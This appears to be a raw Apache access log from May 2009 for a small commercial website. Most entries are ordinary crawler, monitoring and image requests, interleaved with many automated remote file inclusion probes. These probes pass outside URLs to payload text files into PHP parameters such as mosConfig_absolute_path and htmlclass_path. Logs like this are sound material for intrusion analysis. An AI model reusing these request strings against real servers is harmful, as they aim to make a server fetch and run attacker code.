80.237.146.58 - - [25/May/2009:02:58:57 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
80.237.146.58 - - [25/May/2009:02:58:57 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:03:00:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.12 - - [25/May/2009:03:00:25 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
77.221.130.12 - - [25/May/2009:03:00:26 -0400] "GET /?sourcedir=http://www.asd.org.br/sex.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
77.221.130.12 - - [25/May/2009:03:00:26 -0400] "GET /logs/?sourcedir=http://www.asd.org.br/sex.txt?? HTTP/1.1" 200 2758 "-" "libwww-perl/5.805"
98.148.86.106 - - [25/May/2009:03:00:47 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
98.148.86.106 - - [25/May/2009:03:00:47 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
98.148.86.106 - - [25/May/2009:03:00:51 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
98.148.86.106 - - [25/May/2009:03:00:51 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
72.30.142.171 - - [25/May/2009:03:00:51 -0400] "GET /logs/error_log.Q108060600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.23.158.226 - - [25/May/2009:03:00:53 -0400] "GET /logs/access_log.Q109050900//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:00:53 -0400] "GET /logs/access_log.Q108091400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
80.237.146.58 - - [25/May/2009:03:01:37 -0400] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
80.237.146.58 - - [25/May/2009:03:01:37 -0400] "GET /logs/error_log.Q109051400/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
80.237.146.58 - - [25/May/2009:03:01:40 -0400] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
77.221.130.12 - - [25/May/2009:03:01:46 -0400] "GET /logs/access_log.Q108061800/?sourcedir=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
72.30.142.171 - - [25/May/2009:03:01:48 -0400] "GET /logs/error_log.Q107080400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.181.7.97 - - [25/May/2009:03:02:29 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
222.236.44.69 - - [25/May/2009:03:02:51 -0400] "GET //shop/main.php?_shop_path=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
222.236.44.69 - - [25/May/2009:03:02:51 -0400] "GET /logs//shop/main.php?_shop_path=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 217 "-" "libwww-perl/5.803"
222.236.44.69 - - [25/May/2009:03:02:51 -0400] "GET /logs/access_log.Q109050900%20//shop/main.php?_shop_path=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
123.125.64.38 - - [25/May/2009:03:03:31 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
200.93.147.154 - - [25/May/2009:03:04:10 -0400] "GET /phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:04:10 -0400] "GET /logs/phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:04:12 -0400] "GET /logs/access_log.Q108082000%20%20/phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:04:16 -0400] "GET /logs/access_log.Q108082000%20%20/phphtml.php?htmlclass_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:04:16 -0400] "GET /phphtml.php?htmlclass_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:04:16 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:04:26 -0400] "GET /logs/error_log.Q108102600%20%20/phphtml.php?htmlclass_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:04:38 -0400] "GET /logs/error_log.Q108102600%20%20/phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
80.237.146.58 - - [25/May/2009:03:05:00 -0400] "GET /logs/error_log.Q109051400%20%20/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:03:05:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.104.47.218 - - [25/May/2009:03:05:34 -0400] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:03:05:34 -0400] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:03:05:35 -0400] "GET /logs/error_log.Q109051400/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:03:05:40 -0400] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:03:05:40 -0400] "GET /logs/error_log.Q109051400%20%20/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:03:05:45 -0400] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:06:12 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:06:12 -0400] "GET /logs/error_log.Q108102600%20%20/phphtml.php?htmlclass_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:06:12 -0400] "GET /phphtml.php?htmlclass_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:03:06:13 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:03:06:13 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:03:06:15 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:03:06:15 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:06:23 -0400] "GET /phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:06:23 -0400] "GET /logs/phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:06:23 -0400] "GET /logs/access_log.Q108082000%20%20/phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:03:06:28 -0400] "GET /logs/error_log.Q108122800%20%20/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:03:06:44 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:03:06:44 -0400] "GET /logs/errors.php?error=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:03:06:44 -0400] "GET /errors.php?error=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:06:46 -0400] "GET /phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:06:46 -0400] "GET /logs/access_log.Q108082000%20%20/phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:06:47 -0400] "GET /logs/phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:06:50 -0400] "GET /logs/access_log.Q108091400%20%20///vwar/backup/errors.php?error=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:06:50 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:06:50 -0400] "GET ///vwar/backup/errors.php?error=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:06:56 -0400] "GET /logs/error_log.Q108102600%20%20/phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:06:59 -0400] "GET /logs/errors.php?error=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:06:59 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:06:59 -0400] "GET /errors.php?error=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:07:02 -0400] "GET /logs/error_log.Q109012200%20%20/phphtml.php?htmlclass_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:07:10 -0400] "GET /logs/error_log.Q108102600%20%20/phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:03:07:40 -0400] "GET /logs/error_log.Q109051400%20%20/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:03:07:54 -0400] "GET /logs/error_log.Q109051400/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
144.213.253.16 - - [25/May/2009:03:08:00 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.8.5)"
144.213.253.16 - - [25/May/2009:03:08:00 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.8.5)"
144.213.253.16 - - [25/May/2009:03:08:01 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.8.5)"
144.213.253.16 - - [25/May/2009:03:08:01 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.8.5)"
207.182.143.50 - - [25/May/2009:03:08:45 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:08:46 -0400] "GET /errors.php?error=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:08:48 -0400] "GET /logs/errors.php?error=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:03:09:08 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:03:09:08 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:03:09:08 -0400] "GET /logs/access_log.Q109042200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
80.191.203.8 - - [25/May/2009:03:09:11 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
80.191.203.8 - - [25/May/2009:03:09:11 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
80.191.203.8 - - [25/May/2009:03:09:19 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
80.191.203.8 - - [25/May/2009:03:09:19 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
67.212.165.114 - - [25/May/2009:03:09:20 -0400] "GET /logs/access_log.Q108091100%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:09:53 -0400] "GET /logs/access_log.Q109051800%20%20///vwar/backup/errors.php?error=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
116.36.213.166 - - [25/May/2009:03:09:58 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:03:10:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.237.146.58 - - [25/May/2009:03:10:30 -0400] "GET /logs/error_log.Q108122800/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:10:41 -0400] "GET ///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:10:41 -0400] "GET /logs///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:10:41 -0400] "GET /logs/access_log.Q108091400%20%20///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:10:42 -0400] "GET /logs///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:10:42 -0400] "GET /logs/access_log.Q108091400%20%20///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:10:42 -0400] "GET ///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:10:50 -0400] "GET /logs///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:10:50 -0400] "GET ///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:10:50 -0400] "GET /logs/access_log.Q108091400%20%20///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.236.44.69 - - [25/May/2009:03:10:50 -0400] "GET /logs/access_log.Q109050900//shop/main.php?_shop_path=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
222.236.44.69 - - [25/May/2009:03:11:00 -0400] "GET /logs/error_log.Q109021100//shop/main.php?_shop_path=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
216.151.134.36 - - [25/May/2009:03:11:22 -0400] "GET /logs/access_log.Q108091400/phphtml.php?htmlclass_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:11:35 -0400] "GET /logs/access_log.Q109051000/phphtml.php?htmlclass_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:13:07 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:03:13:16 -0400] "GET /logs/error_log.Q108122800/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:13:29 -0400] "GET /logs/access_log.Q109051800%20%20///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:13:43 -0400] "GET /logs/access_log.Q109051800%20%20///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:03:13:45 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:14:09 -0400] "GET /logs/access_log.Q109051800%20%20///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:03:14:32 -0400] "GET /logs/error_log.Q108122800/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:03:15:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.57.158.53 - - [25/May/2009:03:15:30 -0400] "GET /logs/error_log.Q108103000//index.php?pagina=http://www.bioruta.com/uploads/images/pa.ok??? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
69.57.158.53 - - [25/May/2009:03:15:31 -0400] "GET //index.php?pagina=http://www.bioruta.com/uploads/images/pa.ok??? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
69.57.158.53 - - [25/May/2009:03:15:33 -0400] "GET /logs//index.php?pagina=http://www.bioruta.com/uploads/images/pa.ok??? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
212.227.96.166 - - [25/May/2009:03:15:41 -0400] "GET /?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:15:41 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:15:41 -0400] "GET /logs/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:16:17 -0400] "GET /logs/access_log.Q108091400/phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.125.64.49 - - [25/May/2009:03:16:23 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
212.227.96.166 - - [25/May/2009:03:16:37 -0400] "GET /?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:16:37 -0400] "GET /logs/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:16:37 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:16:37 -0400] "GET /logs/access_log.Q108061500/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:16:39 -0400] "GET /logs/access_log.Q109051000/phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.57.158.53 - - [25/May/2009:03:16:42 -0400] "GET /logs/error_log.Q109050400//index.php?pagina=http://www.bioruta.com/uploads/images/pa.ok??? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
212.227.96.166 - - [25/May/2009:03:16:49 -0400] "GET /?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:16:49 -0400] "GET /logs/error_log.Q108090500%20%20/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:16:49 -0400] "GET /logs/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
123.125.64.51 - - [25/May/2009:03:17:22 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
58.227.193.198 - - [25/May/2009:03:18:22 -0400] "GET /logs/access_log.Q108091400/phphtml.php?htmlclass_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:18:51 -0400] "GET /logs/access_log.Q109051000/phphtml.php?htmlclass_path=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:19:52 -0400] "GET /?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:19:52 -0400] "GET /logs/access_log.Q109011800/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
212.227.96.166 - - [25/May/2009:03:19:52 -0400] "GET /logs/?sourcedir=http://www.klean-tech.com.tw/UserFiles/copyright.txt???? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:03:20:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.185.20.88 - - [25/May/2009:03:21:27 -0400] "GET /logs/error_log.Q108081200%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
